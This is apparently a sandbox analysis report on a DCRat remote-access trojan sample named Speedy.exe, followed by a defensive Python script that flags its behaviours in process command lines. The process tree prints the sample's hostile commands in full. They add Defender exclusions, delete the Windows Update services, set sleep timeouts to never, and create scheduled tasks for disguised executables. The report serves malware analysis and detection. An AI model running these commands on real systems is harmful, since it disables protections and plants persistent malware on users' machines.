Analysis

  • max time kernel
    136s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240709-en locale:en-us os:windows10-2004-x64 system
  • submitted
    21-07-2024 19:24

General

  • Target

    Speedy.exe

  • Size

    160KB

  • MD5

    7b9610cdb99b9973810e3e25e2548ba9

  • SHA1

    776ecee620560f31d35fbd9894737e7b4133d29a

  • SHA256

    1c0757e44587291a3152fe7c3ee1d49c64c5ad9bbfd2123a65a772783f0bc096

  • SHA512

    29d185e3dcd8bfadd3f8c30bf03ac57a44d10581859a6a449339b63e86be9d02c8a9382f27d82474006770afce8f1d80cb69acd8abc761656bd9cf3d2a4e3660

  • SSDEEP

    3072:Tu6Wqq2AkZytOeiibKnESWEA6eb7THe+fgy2MPSX16zhn9gkZkb/Xw:q69q2AgytuimESWEA7DfgynPSX1mn9ub

Malware Config

Signatures

  • DcRat

    DarkCrystal RAT (DCRat) is a .NET remote access trojan, active since June 2019, that can load additional plugins.

  • Modifies security service 2 TTPs 5 IoCs
  • Process spawned unexpected child process 39 IoCs

    This typically indicates the parent process was compromised via an exploit or macro. In this run the signature fires on the schtasks.exe invocations listed at depth 1 of the process tree, for which no parent process was recorded.

  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    PowerShell is used to change Windows Defender settings. Here Add-MpPreference -ExclusionPath first excludes the user profile and Program Files, then C:\ itself and every top-level directory under it, so nothing on the system drive is scanned.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up the country code configured in the registry, most likely to geofence execution.

  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 5 IoCs

    powercfg controls a Windows system's configurable power settings. Here the hibernate and standby (sleep) timeouts are set to 0 (never) on both AC and battery power, so an infected host stays awake and reachable.

  • Drops file in Program Files directory 27 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 5 IoCs

    sc.exe is the Windows utility for controlling services. Here it stops the Windows Update related services (UsoSvc, WaaSMedicSvc, wuauserv, BITS and DoSvc) immediately before reg.exe deletes their keys under HKLM\SYSTEM\CurrentControlSet\Services, which keeps them from being restarted and leaves the host unable to receive updates.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 39 IoCs

    schtasks is commonly used by malware for persistence or to trigger post-infection execution. Each task created below points at a dropped executable carrying a Windows system binary name (lsass.exe, winlogon.exe, RuntimeBroker.exe, conhost.exe, ...) in a directory where that binary never lives, and runs it either at logon or every few minutes, mostly with /rl HIGHEST.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Speedy.exe
    "C:\Users\Admin\AppData\Local\Temp\Speedy.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "[base64 command not preserved in this copy]"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#quz#>[System.Windows.Forms.MessageBox]::Show('Error 401: No VPS is allowed!','','OK','Error')<#fxy#>;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2556
      • C:\Users\Admin\AppData\Local\Temp\ft.exe
        "C:\Users\Admin\AppData\Local\Temp\ft.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:4876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5092
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1380
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:2028
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1620
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:4288
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:1708
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:3124
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            5⤵
            PID:1540
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            5⤵
            PID:452
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            5⤵
            • Modifies security service
            PID:4060
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            5⤵
            PID:1628
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
            5⤵
            PID:3824
        • C:\Windows\SYSTEM32\cmd.exe
          cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          4⤵
          • Power Settings
          • Suspicious use of WriteProcessMemory
          PID:1256
          • C:\Windows\system32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4980
          • C:\Windows\system32\powercfg.exe
            powercfg /x -hibernate-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:3220
          • C:\Windows\system32\powercfg.exe
            powercfg /x -standby-timeout-ac 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4260
          • C:\Windows\system32\powercfg.exe
            powercfg /x -standby-timeout-dc 0
            5⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:2720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell <#velngcggt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskEditor' /tr '''C:\Program Files\Google\Chrome\updaterload.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaterload.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskEditor' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskEditor" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updaterload.exe' }
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4304
      • C:\Users\Admin\AppData\Local\Temp\Tor.exe
        "C:\Users\Admin\AppData\Local\Temp\Tor.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\KNpp6xs8D.vbe"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4108
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\unV39Cxd.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1028
            • C:\DriverHostCrtNet\comSvc.exe
              "C:\DriverHostCrtNet\comSvc.exe"
              6⤵
              • Drops file in Drivers directory
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4404
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2472
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3452
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3940
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:1948
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3140
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3364
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4364
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2764
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2784
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4616
              • C:\DriverHostCrtNet\System.exe
                "C:\DriverHostCrtNet\System.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Modifies registry class
                PID:3320
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\41a9a8e6-06e8-42ac-bf79-d2643ae41989.vbs"
                  8⤵
                  PID:1464
                  • C:\DriverHostCrtNet\System.exe
                    C:\DriverHostCrtNet\System.exe
                    9⤵
                    • Executes dropped EXE
                    PID:5280
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09dcb6ba-2fbe-4e02-acba-0a7b176ef713.vbs"
                  8⤵
                  PID:2292
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5036
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1084
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Package Cache\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}v48.108.8828\services.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:648
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3180
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3060
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Java\jre-1.8\lib\images\cursors\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4516
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:552
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3384
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\DriverHostCrtNet\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3228
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:752
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1836
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4092
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3980
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1008
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2556
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4268
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1544
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\Web\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4108
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\DriverHostCrtNet\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4372
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4484
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4364
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:464
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4616
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4688
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3080
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:448
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4164
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2896
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3580
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Google\Temp\winlogon.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4316
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4628
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2192
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4228
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\unsecapp.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4824
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:2780
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\unsecapp.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:3412
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:5036
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:4552
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Scheduled Task/Job: Scheduled Task
    PID:1084
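The behaviours in the signature list and the process tree above, as an added triage example that is not part of the sandbox report: a small Python rule set that scans process command lines for the four techniques this sample chains (Defender path exclusions via Add-MpPreference, stopping and deleting the Windows Update services, zeroing the powercfg timeouts, and schtasks entries that run a system-binary name from a directory where that binary never ships). The sample lines are copied from the tree above plus two constructed benign controls; the expected-directory table and the rule names are the example author's assumptions, not data from the report.

```python
"""Command-line triage rules for the behaviours flagged in this report.
Added example, not part of the sandbox output: feed it process command lines
(EDR telemetry, a sandbox tree) and it reports Defender exclusions, Windows
Update service sabotage, power-timeout changes and masquerading scheduled tasks."""
import re
from collections import Counter
from dataclasses import dataclass

@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str

# Services the sample stops and whose service keys it deletes (see the tree above).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# Lower-case directory prefix where the genuine binary of each impersonated name
# ships. None: no legitimate binary of that name exists, so every task using it is
# reported. These prefixes are the example author's assumptions, not report data.
EXPECTED_DIR = {
    "lsass.exe": r"c:\windows\system32", "winlogon.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32", "conhost.exe": r"c:\windows\system32",
    "runtimebroker.exe": r"c:\windows\system32", "backgroundtaskhost.exe": r"c:\windows\system32",
    "unsecapp.exe": r"c:\windows\system32\wbem", "searchapp.exe": r"c:\windows\systemapps",
    "startmenuexperiencehost.exe": r"c:\windows\systemapps",
    "officeclicktorun.exe": r"c:\program files\common files\microsoft shared\clicktorun",
    "system.exe": None,
}

_EXCLUSION = re.compile(
    r"add-mppreference\b.*?-exclusion(path|extension|process)\s+(.+?)(?:\s+-force)?\s*$", re.I)
_SC_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\S+)", re.I)
_REG_DEL = re.compile(
    r"reg(?:\.exe)?\s+delete\s+\"?hklm\\system\\currentcontrolset\\services\\([^\"\s]+)", re.I)
_POWERCFG = re.compile(
    r"powercfg(?:\.exe)?\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I)
_SCHTASKS = re.compile(
    r"schtasks(?:\.exe)?\s+/create\b.*?/tn\s+\"?([^\"\s]+)\"?.*?/tr\s+\"'?([^'\"]+)'?\"", re.I)

def _masquerade(task_name, target, elevated):
    """Flag a task that runs a system-binary name from a directory where that
    binary does not ship, or a name (System.exe) with no genuine owner at all."""
    directory, _, base = target.rpartition("\\")
    expected = EXPECTED_DIR.get(base.lower(), "")
    if expected == "" or (expected and directory.lower().startswith(expected)):
        return None  # not an impersonated name, or the genuine location
    level = "highest" if elevated else "default"
    return Finding("task_masquerade", f"{task_name} -> {target} (run level {level})")

def triage(cmdlines):
    """Run every rule over every command line; findings come back in input order."""
    findings = []
    for line in cmdlines:
        for m in _EXCLUSION.finditer(line):
            value = m.group(2).strip("'\"")
            findings.append(Finding("defender_exclusion", f"{m.group(1).lower()}={value}"))
        for m in _SC_STOP.finditer(line):
            if m.group(1).lower() in UPDATE_SERVICES:
                findings.append(Finding("service_stop", m.group(1)))
        for m in _REG_DEL.finditer(line):
            if m.group(1).lower() in UPDATE_SERVICES:
                findings.append(Finding("service_key_delete", m.group(1)))
        for m in _POWERCFG.finditer(line):
            findings.append(Finding("power_timeout", f"{m.group(1)}-{m.group(2)}=never"))
        elevated = re.search(r"/rl\s+highest", line, re.I) is not None
        for m in _SCHTASKS.finditer(line):
            hit = _masquerade(m.group(1), m.group(2), elevated)
            if hit:
                findings.append(hit)
    return findings

def summarize(findings):
    """Number of findings per rule, e.g. {'service_stop': 5, ...}."""
    return dict(Counter(f.rule for f in findings))

# Constructed sample: the first six entries are copied from the process tree above;
# the last two are benign controls that must not fire.
SAMPLE = [
    r"powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r"cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"
    r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f'
    r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f'
    r' & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f',
    r"cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    "\"powershell\" -Command Add-MpPreference -ExclusionPath 'C:/'",
    r'''schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\lsass.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\DriverHostCrtNet\System.exe'" /f''',
    r"sc stop Spooler",
    r'''schtasks.exe /create /tn "Backup" /sc DAILY /tr "'C:\Windows\System32\conhost.exe'" /f''',
]

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.rule:20} {f.detail}")
```

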